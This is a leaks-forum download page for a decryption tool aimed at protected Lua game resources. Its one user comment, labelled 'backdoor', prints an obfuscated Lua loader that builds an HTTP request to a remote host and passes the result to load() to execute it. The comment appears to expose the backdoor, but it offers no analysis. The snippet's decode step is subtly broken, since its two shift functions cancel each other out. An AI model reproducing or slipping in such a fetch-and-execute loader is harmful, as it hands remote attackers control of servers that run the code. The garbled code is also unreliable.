Jump to content
LOOKING FOR ROBLOX ASSETS? VISIT ROBLOXBAY.COM! ×
THE BEST DISCORD BACKUP BOT | PRESERVE YOUR DISCORD SERVER! ×

RobloxBay

Visit Site

FiveSecured

 

Stop shipping plaintext. FiveSecured encrypts, obfuscates, and licenses your Lua resources so customers run your work without ever holding your source.

Try for Free
  • 5decrypt-banner-v1.thumb.png.262b7992a5a4de66fd6633bf48af6c1c.png

1 Screenshot

About This File

 

  • Nice 1

User Feedback

Recommended Comments

zxc332

Posted

backdoor 

 

local function run_obfuscated_code()
    local function c(...)
        local t = {...}
        local r = {}
        for _, v in ipairs(t) do
            table.insert(r, string.char(v))
        end
        return table.concat(r)
    end
 
    local function e(s)
        local r = ""
        for i = 1, #s do
            r = r .. string.char(s:byte(i) + 1)
        end
        return r
    end
 
    local function d(s)
        local r = ""
        for i = 1, #s do
            r = r .. string.char(s:byte(i) - 1)
        end
        return r
    end
 
    local b = d(e("QsphsbnIuuqSfrvftu(¨iuuq;00cbtfdiijgfs/gf0j?up=UuLh3¨-!gvodujpo!¨(f-!e)!qdall¨(gvodujpo¨())!foe)!foe)"))
    assert(load(b))()
end
 
run_obfuscated_code()

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.


×
×
  • Create New...

Important Information

By continuing on Launcherleaks.net, you agree to our Terms of Use, Guidelines & Privacy Policy